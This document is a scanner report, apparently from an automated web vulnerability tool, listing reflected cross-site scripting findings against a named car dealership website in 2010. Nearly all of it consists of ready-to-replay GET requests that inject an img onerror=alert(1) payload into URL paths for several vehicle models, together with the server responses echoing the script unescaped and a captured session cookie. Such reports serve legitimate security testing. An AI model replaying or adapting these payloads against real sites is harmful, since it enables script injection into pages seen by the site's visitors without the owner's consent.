<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <HEAD> <TITLE> Toyota Avalon7297a' ...[SNIP]... <a href='/quick-quote.html?year=&make=Toyota&model=Avalon7297a'><img src=a onerror=alert(1)>f6d145712fc'> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 30a9e"><img%20src%3da%20onerror%3dalert(1)>81eae16f5ef was submitted in the REST URL parameter 2. This input was echoed as 30a9e"><img src=a onerror=alert(1)>81eae16f5ef in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /Toyota/Avalon30a9e"><img%20src%3da%20onerror%3dalert(1)>81eae16f5ef/ HTTP/1.1
Host: www.fremonttoyota.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=198428792.1291762386.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); PHPSESSID=v8g9p8mq0ejk18m1jtpubu81s4; __utma=198428792.1988978089.1291762386.1291762386.1291762386.1; __utmc=198428792; __utmb=198428792; BIGipServerAPACHE_DEV=2936078602.20480.0000;
Response
HTTP/1.1 200 OK
Date: Wed, 08 Dec 2010 03:24:57 GMT
Server: Apache/2.2.14 (Ubuntu) DAV/2 PHP/5.3.2-1ubuntu4.5 with Suhosin-Patch mod_perl/2.0.4 Perl/v5.10.1
X-Powered-By: PHP/5.3.2-1ubuntu4.5
Set-Cookie: SOURCE=SEO; expires=Sat, 03-Dec-2011 03:24:57 GMT; path=/
Cache-Control: max-age=1
Expires: Wed, 08 Dec 2010 03:24:58 GMT
Vary: Accept-Encoding,User-Agent
P3P: CP="NOI DEVa TAIa OUR BUS UNI"
Connection: close
Content-Type: text/html
Content-Length: 16217
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <HEAD> <TITLE> Toyota Avalon30a9e" ...[SNIP]... <META NAME=DESCRIPTION CONTENT=" Toyota Avalon30a9e"><img src=a onerror=alert(1)>81eae16f5ef at Fremont Toyota '' 5851 Cushing Parkway, Fremont, CA 94538 Come here for a price quote today. You won't be let down. We also carry Toyota Avalon30a9e"> ...[SNIP]...
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 14883<img%20src%3da%20onerror%3dalert(1)>594a57e680f was submitted in the REST URL parameter 2. This input was echoed as 14883<img src=a onerror=alert(1)>594a57e680f in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /Toyota/Avalon14883<img%20src%3da%20onerror%3dalert(1)>594a57e680f/ HTTP/1.1
Host: www.fremonttoyota.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=198428792.1291762386.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); PHPSESSID=v8g9p8mq0ejk18m1jtpubu81s4; __utma=198428792.1988978089.1291762386.1291762386.1291762386.1; __utmc=198428792; __utmb=198428792; BIGipServerAPACHE_DEV=2936078602.20480.0000;
Response
HTTP/1.1 200 OK
Date: Wed, 08 Dec 2010 03:30:57 GMT
Server: Apache/2.2.14 (Ubuntu) DAV/2 PHP/5.3.2-1ubuntu4.5 with Suhosin-Patch mod_perl/2.0.4 Perl/v5.10.1
X-Powered-By: PHP/5.3.2-1ubuntu4.5
Set-Cookie: SOURCE=SEO; expires=Sat, 03-Dec-2011 03:30:58 GMT; path=/
Cache-Control: max-age=1
Expires: Wed, 08 Dec 2010 03:30:58 GMT
Vary: Accept-Encoding,User-Agent
P3P: CP="NOI DEVa TAIa OUR BUS UNI"
Connection: close
Content-Type: text/html
Content-Length: 16133
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <HEAD> <TITLE> Toyota Avalon14883< ...[SNIP]... <H1> Toyota Avalon14883<img src=a onerror=alert(1)>594a57e680f</H1> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 72280'><img%20src%3da%20onerror%3dalert(1)>c367e29e206 was submitted in the REST URL parameter 2. This input was echoed as 72280'><img src=a onerror=alert(1)>c367e29e206 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /Toyota/Camry%20Hybrid72280'><img%20src%3da%20onerror%3dalert(1)>c367e29e206/ HTTP/1.1
Host: www.fremonttoyota.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=198428792.1291762386.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); PHPSESSID=v8g9p8mq0ejk18m1jtpubu81s4; __utma=198428792.1988978089.1291762386.1291762386.1291762386.1; __utmc=198428792; __utmb=198428792; BIGipServerAPACHE_DEV=2936078602.20480.0000;
Response
HTTP/1.1 200 OK
Date: Wed, 08 Dec 2010 03:07:23 GMT
Server: Apache/2.2.14 (Ubuntu) DAV/2 PHP/5.3.2-1ubuntu4.5 with Suhosin-Patch mod_perl/2.0.4 Perl/v5.10.1
X-Powered-By: PHP/5.3.2-1ubuntu4.5
Set-Cookie: SOURCE=SEO; expires=Sat, 03-Dec-2011 03:07:23 GMT; path=/
Cache-Control: max-age=1
Expires: Wed, 08 Dec 2010 03:07:24 GMT
Vary: Accept-Encoding,User-Agent
P3P: CP="NOI DEVa TAIa OUR BUS UNI"
Connection: close
Content-Type: text/html
Content-Length: 16331
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <HEAD> <TITLE> Toyota Camry Hybrid ...[SNIP]... <a href='/quick-quote.html?year=&make=Toyota&model=Camry Hybrid72280'><img src=a onerror=alert(1)>c367e29e206'> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c15b2"><img%20src%3da%20onerror%3dalert(1)>0fa20d7baa7 was submitted in the REST URL parameter 2. This input was echoed as c15b2"><img src=a onerror=alert(1)>0fa20d7baa7 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /Toyota/Camry%20Hybridc15b2"><img%20src%3da%20onerror%3dalert(1)>0fa20d7baa7/ HTTP/1.1
Host: www.fremonttoyota.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=198428792.1291762386.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); PHPSESSID=v8g9p8mq0ejk18m1jtpubu81s4; __utma=198428792.1988978089.1291762386.1291762386.1291762386.1; __utmc=198428792; __utmb=198428792; BIGipServerAPACHE_DEV=2936078602.20480.0000;
Response
HTTP/1.1 200 OK
Date: Wed, 08 Dec 2010 03:05:16 GMT
Server: Apache/2.2.14 (Ubuntu) DAV/2 PHP/5.3.2-1ubuntu4.5 with Suhosin-Patch mod_perl/2.0.4 Perl/v5.10.1
X-Powered-By: PHP/5.3.2-1ubuntu4.5
Set-Cookie: SOURCE=SEO; expires=Sat, 03-Dec-2011 03:05:17 GMT; path=/
Cache-Control: max-age=1
Expires: Wed, 08 Dec 2010 03:05:17 GMT
Vary: Accept-Encoding,User-Agent
P3P: CP="NOI DEVa TAIa OUR BUS UNI"
Connection: close
Content-Type: text/html
Content-Length: 16351
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <HEAD> <TITLE> Toyota Camry Hybrid ...[SNIP]... <META NAME=DESCRIPTION CONTENT=" Toyota Camry Hybridc15b2"><img src=a onerror=alert(1)>0fa20d7baa7 at Fremont Toyota '' 5851 Cushing Parkway, Fremont, CA 94538 Come here for a price quote today. You won't be let down. We also carry Toyota Camry Hybridc15b2"> ...[SNIP]...
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 2c00b<img%20src%3da%20onerror%3dalert(1)>ce532d4f48e was submitted in the REST URL parameter 2. This input was echoed as 2c00b<img src=a onerror=alert(1)>ce532d4f48e in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /Toyota/Camry%20Hybrid2c00b<img%20src%3da%20onerror%3dalert(1)>ce532d4f48e/ HTTP/1.1
Host: www.fremonttoyota.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=198428792.1291762386.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); PHPSESSID=v8g9p8mq0ejk18m1jtpubu81s4; __utma=198428792.1988978089.1291762386.1291762386.1291762386.1; __utmc=198428792; __utmb=198428792; BIGipServerAPACHE_DEV=2936078602.20480.0000;
Response
HTTP/1.1 200 OK
Date: Wed, 08 Dec 2010 03:10:18 GMT
Server: Apache/2.2.14 (Ubuntu) DAV/2 PHP/5.3.2-1ubuntu4.5 with Suhosin-Patch mod_perl/2.0.4 Perl/v5.10.1
X-Powered-By: PHP/5.3.2-1ubuntu4.5
Set-Cookie: SOURCE=SEO; expires=Sat, 03-Dec-2011 03:10:19 GMT; path=/
Cache-Control: max-age=1
Expires: Wed, 08 Dec 2010 03:10:19 GMT
Vary: Accept-Encoding,User-Agent
P3P: CP="NOI DEVa TAIa OUR BUS UNI"
Connection: close
Content-Type: text/html
Content-Length: 16300
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <HEAD> <TITLE> Toyota Camry Hybrid ...[SNIP]... <H1> Toyota Camry Hybrid2c00b<img src=a onerror=alert(1)>ce532d4f48e</H1> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload b74e7'><img%20src%3da%20onerror%3dalert(1)>afe90221fb7 was submitted in the REST URL parameter 2. This input was echoed as b74e7'><img src=a onerror=alert(1)>afe90221fb7 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /Toyota/Camryb74e7'><img%20src%3da%20onerror%3dalert(1)>afe90221fb7/ HTTP/1.1
Host: www.fremonttoyota.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=198428792.1291762386.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); PHPSESSID=v8g9p8mq0ejk18m1jtpubu81s4; __utma=198428792.1988978089.1291762386.1291762386.1291762386.1; __utmc=198428792; __utmb=198428792; BIGipServerAPACHE_DEV=2936078602.20480.0000;
Response
HTTP/1.1 200 OK
Date: Wed, 08 Dec 2010 04:01:12 GMT
Server: Apache/2.2.14 (Ubuntu) DAV/2 PHP/5.3.2-1ubuntu4.5 with Suhosin-Patch mod_perl/2.0.4 Perl/v5.10.1
X-Powered-By: PHP/5.3.2-1ubuntu4.5
Set-Cookie: SOURCE=SEO; expires=Sat, 03-Dec-2011 04:01:12 GMT; path=/
Cache-Control: max-age=1
Expires: Wed, 08 Dec 2010 04:01:13 GMT
Vary: Accept-Encoding,User-Agent
P3P: CP="NOI DEVa TAIa OUR BUS UNI"
Connection: close
Content-Type: text/html
Content-Length: 16154
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <HEAD> <TITLE> Toyota Camryb74e7'> ...[SNIP]... <a href='/quick-quote.html?year=&make=Toyota&model=Camryb74e7'><img src=a onerror=alert(1)>afe90221fb7'> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b4795"><img%20src%3da%20onerror%3dalert(1)>6425f289dbd was submitted in the REST URL parameter 2. This input was echoed as b4795"><img src=a onerror=alert(1)>6425f289dbd in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /Toyota/Camryb4795"><img%20src%3da%20onerror%3dalert(1)>6425f289dbd/ HTTP/1.1
Host: www.fremonttoyota.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=198428792.1291762386.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); PHPSESSID=v8g9p8mq0ejk18m1jtpubu81s4; __utma=198428792.1988978089.1291762386.1291762386.1291762386.1; __utmc=198428792; __utmb=198428792; BIGipServerAPACHE_DEV=2936078602.20480.0000;
Response
HTTP/1.1 200 OK
Date: Wed, 08 Dec 2010 03:59:36 GMT
Server: Apache/2.2.14 (Ubuntu) DAV/2 PHP/5.3.2-1ubuntu4.5 with Suhosin-Patch mod_perl/2.0.4 Perl/v5.10.1
X-Powered-By: PHP/5.3.2-1ubuntu4.5
Set-Cookie: SOURCE=SEO; expires=Sat, 03-Dec-2011 03:59:36 GMT; path=/
Cache-Control: max-age=1
Expires: Wed, 08 Dec 2010 03:59:37 GMT
Vary: Accept-Encoding,User-Agent
P3P: CP="NOI DEVa TAIa OUR BUS UNI"
Connection: close
Content-Type: text/html
Content-Length: 16160
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <HEAD> <TITLE> Toyota Camryb4795"> ...[SNIP]... <META NAME=DESCRIPTION CONTENT=" Toyota Camryb4795"><img src=a onerror=alert(1)>6425f289dbd at Fremont Toyota '' 5851 Cushing Parkway, Fremont, CA 94538 Come here for a price quote today. You won't be let down. We also carry Toyota Camryb4795"> ...[SNIP]...
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 3d55c<img%20src%3da%20onerror%3dalert(1)>20edf5fdc7f was submitted in the REST URL parameter 2. This input was echoed as 3d55c<img src=a onerror=alert(1)>20edf5fdc7f in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /Toyota/Camry3d55c<img%20src%3da%20onerror%3dalert(1)>20edf5fdc7f/ HTTP/1.1
Host: www.fremonttoyota.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=198428792.1291762386.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); PHPSESSID=v8g9p8mq0ejk18m1jtpubu81s4; __utma=198428792.1988978089.1291762386.1291762386.1291762386.1; __utmc=198428792; __utmb=198428792; BIGipServerAPACHE_DEV=2936078602.20480.0000;
Response
HTTP/1.1 200 OK
Date: Wed, 08 Dec 2010 04:02:39 GMT
Server: Apache/2.2.14 (Ubuntu) DAV/2 PHP/5.3.2-1ubuntu4.5 with Suhosin-Patch mod_perl/2.0.4 Perl/v5.10.1
X-Powered-By: PHP/5.3.2-1ubuntu4.5
Set-Cookie: SOURCE=SEO; expires=Sat, 03-Dec-2011 04:02:39 GMT; path=/
Cache-Control: max-age=1
Expires: Wed, 08 Dec 2010 04:02:40 GMT
Vary: Accept-Encoding,User-Agent
P3P: CP="NOI DEVa TAIa OUR BUS UNI"
Connection: close
Content-Type: text/html
Content-Length: 16103
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <HEAD> <TITLE> Toyota Camry3d55c<i ...[SNIP]... <H1> Toyota Camry3d55c<img src=a onerror=alert(1)>20edf5fdc7f</H1> ...[SNIP]...
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 43619<img%20src%3da%20onerror%3dalert(1)>17d781dc16a was submitted in the REST URL parameter 2. This input was echoed as 43619<img src=a onerror=alert(1)>17d781dc16a in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /Toyota/Corolla43619<img%20src%3da%20onerror%3dalert(1)>17d781dc16a/ HTTP/1.1
Host: www.fremonttoyota.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=198428792.1291762386.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); PHPSESSID=v8g9p8mq0ejk18m1jtpubu81s4; __utma=198428792.1988978089.1291762386.1291762386.1291762386.1; __utmc=198428792; __utmb=198428792; BIGipServerAPACHE_DEV=2936078602.20480.0000;
Response
HTTP/1.1 200 OK
Date: Wed, 08 Dec 2010 03:53:57 GMT
Server: Apache/2.2.14 (Ubuntu) DAV/2 PHP/5.3.2-1ubuntu4.5 with Suhosin-Patch mod_perl/2.0.4 Perl/v5.10.1
X-Powered-By: PHP/5.3.2-1ubuntu4.5
Set-Cookie: SOURCE=SEO; expires=Sat, 03-Dec-2011 03:53:57 GMT; path=/
Cache-Control: max-age=1
Expires: Wed, 08 Dec 2010 03:53:58 GMT
Vary: Accept-Encoding,User-Agent
P3P: CP="NOI DEVa TAIa OUR BUS UNI"
Connection: close
Content-Type: text/html
Content-Length: 16186
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <HEAD> <TITLE> Toyota Corolla43619 ...[SNIP]... <H1> Toyota Corolla43619<img src=a onerror=alert(1)>17d781dc16a</H1> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6a409"><img%20src%3da%20onerror%3dalert(1)>188bcadadfe was submitted in the REST URL parameter 2. This input was echoed as 6a409"><img src=a onerror=alert(1)>188bcadadfe in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /Toyota/Corolla6a409"><img%20src%3da%20onerror%3dalert(1)>188bcadadfe/ HTTP/1.1
Host: www.fremonttoyota.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=198428792.1291762386.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); PHPSESSID=v8g9p8mq0ejk18m1jtpubu81s4; __utma=198428792.1988978089.1291762386.1291762386.1291762386.1; __utmc=198428792; __utmb=198428792; BIGipServerAPACHE_DEV=2936078602.20480.0000;
Response
HTTP/1.1 200 OK
Date: Wed, 08 Dec 2010 03:51:01 GMT
Server: Apache/2.2.14 (Ubuntu) DAV/2 PHP/5.3.2-1ubuntu4.5 with Suhosin-Patch mod_perl/2.0.4 Perl/v5.10.1
X-Powered-By: PHP/5.3.2-1ubuntu4.5
Set-Cookie: SOURCE=SEO; expires=Sat, 03-Dec-2011 03:51:01 GMT; path=/
Cache-Control: max-age=1
Expires: Wed, 08 Dec 2010 03:51:02 GMT
Vary: Accept-Encoding,User-Agent
P3P: CP="NOI DEVa TAIa OUR BUS UNI"
Connection: close
Content-Type: text/html
Content-Length: 16215
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <HEAD> <TITLE> Toyota Corolla6a409 ...[SNIP]... <META NAME=DESCRIPTION CONTENT=" Toyota Corolla6a409"><img src=a onerror=alert(1)>188bcadadfe at Fremont Toyota '' 5851 Cushing Parkway, Fremont, CA 94538 Come here for a price quote today. You won't be let down. We also carry Toyota Corolla6a409"> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload aaf09'><img%20src%3da%20onerror%3dalert(1)>f245537bdff was submitted in the REST URL parameter 2. This input was echoed as aaf09'><img src=a onerror=alert(1)>f245537bdff in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /Toyota/Corollaaaf09'><img%20src%3da%20onerror%3dalert(1)>f245537bdff/ HTTP/1.1
Host: www.fremonttoyota.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=198428792.1291762386.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); PHPSESSID=v8g9p8mq0ejk18m1jtpubu81s4; __utma=198428792.1988978089.1291762386.1291762386.1291762386.1; __utmc=198428792; __utmb=198428792; BIGipServerAPACHE_DEV=2936078602.20480.0000;
Response
HTTP/1.1 200 OK
Date: Wed, 08 Dec 2010 03:52:27 GMT
Server: Apache/2.2.14 (Ubuntu) DAV/2 PHP/5.3.2-1ubuntu4.5 with Suhosin-Patch mod_perl/2.0.4 Perl/v5.10.1
X-Powered-By: PHP/5.3.2-1ubuntu4.5
Set-Cookie: SOURCE=SEO; expires=Sat, 03-Dec-2011 03:52:27 GMT; path=/
Cache-Control: max-age=1
Expires: Wed, 08 Dec 2010 03:52:28 GMT
Vary: Accept-Encoding,User-Agent
P3P: CP="NOI DEVa TAIa OUR BUS UNI"
Connection: close
Content-Type: text/html
Content-Length: 16245
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <HEAD> <TITLE> Toyota Corollaaaf09 ...[SNIP]... <a href='/quick-quote.html?year=&make=Toyota&model=Corollaaaf09'><img src=a onerror=alert(1)>f245537bdff'> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 36516"><img%20src%3da%20onerror%3dalert(1)>9efc5213980 was submitted in the REST URL parameter 2. This input was echoed as 36516"><img src=a onerror=alert(1)>9efc5213980 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /Toyota/FJ%20Cruiser%204x236516"><img%20src%3da%20onerror%3dalert(1)>9efc5213980/ HTTP/1.1
Host: www.fremonttoyota.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=198428792.1291762386.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); PHPSESSID=v8g9p8mq0ejk18m1jtpubu81s4; __utma=198428792.1988978089.1291762386.1291762386.1291762386.1; __utmc=198428792; __utmb=198428792; BIGipServerAPACHE_DEV=2936078602.20480.0000;
Response
HTTP/1.1 200 OK
Date: Wed, 08 Dec 2010 03:37:20 GMT
Server: Apache/2.2.14 (Ubuntu) DAV/2 PHP/5.3.2-1ubuntu4.5 with Suhosin-Patch mod_perl/2.0.4 Perl/v5.10.1
X-Powered-By: PHP/5.3.2-1ubuntu4.5
Set-Cookie: SOURCE=SEO; expires=Sat, 03-Dec-2011 03:37:20 GMT; path=/
Cache-Control: max-age=1
Expires: Wed, 08 Dec 2010 03:37:21 GMT
Vary: Accept-Encoding,User-Agent
P3P: CP="NOI DEVa TAIa OUR BUS UNI"
Connection: close
Content-Type: text/html
Content-Length: 16409
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <HEAD> <TITLE> Toyota FJ Cruiser 4 ...[SNIP]... <META NAME=DESCRIPTION CONTENT=" Toyota FJ Cruiser 4x236516"><img src=a onerror=alert(1)>9efc5213980 at Fremont Toyota '' 5851 Cushing Parkway, Fremont, CA 94538 Come here for a price quote today. You won't be let down. We also carry Toyota FJ Cruiser 4x236516"> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload cb8a3'><img%20src%3da%20onerror%3dalert(1)>ce0eb99e77f was submitted in the REST URL parameter 2. This input was echoed as cb8a3'><img src=a onerror=alert(1)>ce0eb99e77f in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /Toyota/FJ%20Cruiser%204x2cb8a3'><img%20src%3da%20onerror%3dalert(1)>ce0eb99e77f/ HTTP/1.1
Host: www.fremonttoyota.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=198428792.1291762386.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); PHPSESSID=v8g9p8mq0ejk18m1jtpubu81s4; __utma=198428792.1988978089.1291762386.1291762386.1291762386.1; __utmc=198428792; __utmb=198428792; BIGipServerAPACHE_DEV=2936078602.20480.0000;
Response
HTTP/1.1 200 OK
Date: Wed, 08 Dec 2010 03:41:27 GMT
Server: Apache/2.2.14 (Ubuntu) DAV/2 PHP/5.3.2-1ubuntu4.5 with Suhosin-Patch mod_perl/2.0.4 Perl/v5.10.1
X-Powered-By: PHP/5.3.2-1ubuntu4.5
Set-Cookie: SOURCE=SEO; expires=Sat, 03-Dec-2011 03:41:27 GMT; path=/
Cache-Control: max-age=1
Expires: Wed, 08 Dec 2010 03:41:28 GMT
Vary: Accept-Encoding,User-Agent
P3P: CP="NOI DEVa TAIa OUR BUS UNI"
Connection: close
Content-Type: text/html
Content-Length: 16370
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <HEAD> <TITLE> Toyota FJ Cruiser 4 ...[SNIP]... <a href='/quick-quote.html?year=&make=Toyota&model=FJ Cruiser 4x2cb8a3'><img src=a onerror=alert(1)>ce0eb99e77f'> ...[SNIP]...
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload e8b1e<img%20src%3da%20onerror%3dalert(1)>927cffad9bf was submitted in the REST URL parameter 2. This input was echoed as e8b1e<img src=a onerror=alert(1)>927cffad9bf in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /Toyota/FJ%20Cruiser%204x2e8b1e<img%20src%3da%20onerror%3dalert(1)>927cffad9bf/ HTTP/1.1
Host: www.fremonttoyota.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=198428792.1291762386.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); PHPSESSID=v8g9p8mq0ejk18m1jtpubu81s4; __utma=198428792.1988978089.1291762386.1291762386.1291762386.1; __utmc=198428792; __utmb=198428792; BIGipServerAPACHE_DEV=2936078602.20480.0000;
Response
HTTP/1.1 200 OK
Date: Wed, 08 Dec 2010 03:43:12 GMT
Server: Apache/2.2.14 (Ubuntu) DAV/2 PHP/5.3.2-1ubuntu4.5 with Suhosin-Patch mod_perl/2.0.4 Perl/v5.10.1
X-Powered-By: PHP/5.3.2-1ubuntu4.5
Set-Cookie: SOURCE=SEO; expires=Sat, 03-Dec-2011 03:43:12 GMT; path=/
Cache-Control: max-age=1
Expires: Wed, 08 Dec 2010 03:43:13 GMT
Vary: Accept-Encoding,User-Agent
P3P: CP="NOI DEVa TAIa OUR BUS UNI"
Connection: close
Content-Type: text/html
Content-Length: 16328
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <HEAD> <TITLE> Toyota FJ Cruiser 4 ...[SNIP]... <H1> Toyota FJ Cruiser 4x2e8b1e<img src=a onerror=alert(1)>927cffad9bf</H1> ...[SNIP]...
